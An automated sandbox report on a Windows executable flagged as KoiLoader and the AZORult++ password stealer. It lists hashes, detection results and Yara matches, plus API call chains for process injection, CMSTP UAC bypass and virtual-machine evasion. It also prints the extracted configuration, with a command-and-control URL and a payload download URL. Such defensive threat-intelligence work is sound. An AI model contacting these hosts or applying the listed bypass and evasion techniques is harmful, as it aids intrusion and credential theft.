Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe
Analysis ID:	1674076
MD5:	1452d6a3ec8d69b0b331bc751e9c117b
SHA1:	9bf39e1ff35659600fc2220e322f0319f5d8add0
SHA256:	eed8806090ae11e888fceb18bb633068a6cab9aeac590c10fb2d4b74e0251d84
Tags:	exeuser-SecuriteInfoCom
Infos:

Detection

AZORult++, KoiLoader

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Contains functionality to bypass UAC (CMSTPLUA)

Detected AZORult++ Trojan

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected KoiLoader

Yara detected UAC Bypass using CMSTP

C2 URLs / IPs found in malware configuration

Contain functionality to detect virtual machines

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Found evasive API chain (may stop execution after checking mutex)

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe (PID: 7560 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe" MD5: 1452D6A3EC8D69B0B331BC751E9C117B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Koi Loader		No Attribution	https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1 https://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer	https://malpedia.caad.fkie.fraunhofer.de/details/win.koiloader

Malware Configuration

Threatname: KoiLoader

{
  "C2": "http://79.124.78.173/incongruousness.php",
  "Payload url": "https://www.wilkinsonbeane.com/css/slider"
}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe PID: 7560	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe PID: 7560	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.unpack	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.bd0000.1.unpack	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.bd0000.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.bd0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1830:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x9bf6:$s1: CoGetObject
0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.raw.unpack	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1830:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x9bf6:$s1: CoGetObject
Click to see the 3 entries

Joe Sandbox Signatures

• AV Detection
• Cryptography
• Exploits
• Privilege Escalation
• Compliance
• Spreading
• Networking
• E-Banking Fraud
• System Summary
• Data Obfuscation
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://79.124.78.173/incongruousness.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: KoiLoader {"C2": "http://79.124.78.173/incongruousness.php", "Payload url": "https://www.wilkinsonbeane.com/css/slider"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Virustotal: Detection: 80%			Perma Link
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	ReversingLabs: Detection: 80%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00BD86E6 Sleep,Sleep,Sleep,InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,	0_2_00BD86E6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00BD93A0 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	0_2_00BD93A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00BD8710 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,	0_2_00BD8710

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.bd0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe PID: 7560, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Code function: 0_2_00BD72E0 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,lstrlenW,ExpandEnvironmentStringsW,GetSystemWow64DirectoryW,GetLastError,wnsprintfW,wnsprintfW,ExpandEnvironmentStringsW,wnsprintfW,SetFileAttributesW,lstrcpyW,GetUserNameW,NetUserGetInfo,NetApiBufferFree,CoInitializeEx,lstrlenW,wsprintfW,CoGetObject,CoUninitialize,

0_2_00BD72E0

Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00D19A4A FindFirstFileExW,		0_2_00D19A4A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00BD89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetFileAttributesW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,		0_2_00BD89F0

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://79.124.78.173/incongruousness.php

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Code function: 0_2_00BD6830 HeapFree,ObtainUserAgentString,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,InternetOpenW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetQueryDataAvailable,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00BD6830

Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	String found in binary or memory: http://79.124.78.173/incongruousness.php
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.78.173/incongruousness.php%temp%
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	String found in binary or memory: https://www.wilkinsonbeane.com/css/slider
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.wilkinsonbeane.com/css/slider/c

E-Banking Fraud

Detected AZORult++ Trojan

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Code function: 0_2_00BD9240 EntryPoint,GetUserDefaultLangID,ExitProcess,

0_2_00BD9240

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.bd0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00BD5C70 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,		0_2_00BD5C70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00BD5FD0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,		0_2_00BD5FD0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00D15185	0_2_00D15185
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00D1FD81	0_2_00D1FD81
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00BD7C30	0_2_00BD7C30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00BD26B0	0_2_00BD26B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00BD43D0	0_2_00BD43D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00BD47D0	0_2_00BD47D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00BD7710	0_2_00BD7710

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: String function: 00D13D10 appears 82 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: String function: 00D15140 appears 33 times

Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.bd0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: classification engine

Classification label: mal100.bank.troj.expl.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Code function: 0_2_00BD6370 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,

0_2_00BD6370

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Code function: 0_2_00BD6C60 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,

0_2_00BD6C60

Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Virustotal: Detection: 80%
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	ReversingLabs: Detection: 80%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Yara detected KoiLoader

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.bd0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe PID: 7560, type: MEMORYSTR

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Code function: 0_2_00D11300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00D11300

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Code function: 0_2_00D20491 push ecx; ret

0_2_00D204A4

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe

0_2_00BD89F0

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetFileAttributesW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,

0_2_00BD89F0

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_0-13108

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

File opened / queried: C:\Windows\System32\VBoxService.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

API coverage: 9.7 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00D19A4A FindFirstFileExW,		0_2_00D19A4A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Code function: 0_2_00BD89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetFileAttributesW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,		0_2_00BD89F0

Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe	Binary or memory string: Hyper-V
